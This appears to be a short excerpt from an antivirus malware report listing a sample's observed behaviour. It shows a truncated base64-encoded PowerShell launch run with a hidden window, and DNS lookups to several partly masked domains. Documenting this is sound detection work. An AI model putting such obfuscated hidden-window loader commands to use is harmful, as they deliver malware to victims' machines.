Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABGAHoAbABuAGkAYwB3AGgAcAB5AD0AJwBTAHUAawB3AG8AdgByAHcAJwA7ACQASwB6AHkAcwBvAGoAbgBkACAAPQAgACcANgA1AD...
- DNS ASK tr####envision.com
- DNS ASK tr###lexeq.com
- DNS ASK we#####stdatacom.com
- DNS ASK va###nesia.com
- DNS ASK ym####esswear.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABGAHoAbABuAGkAYwB3AGgAcAB5AD0AJwBTAHUAawB3AG8AdgByAHcAJwA7ACQASwB6AHkAcwBvAGoAbgBkACAAPQAgACcANgA1AD...' (со скрытым окном)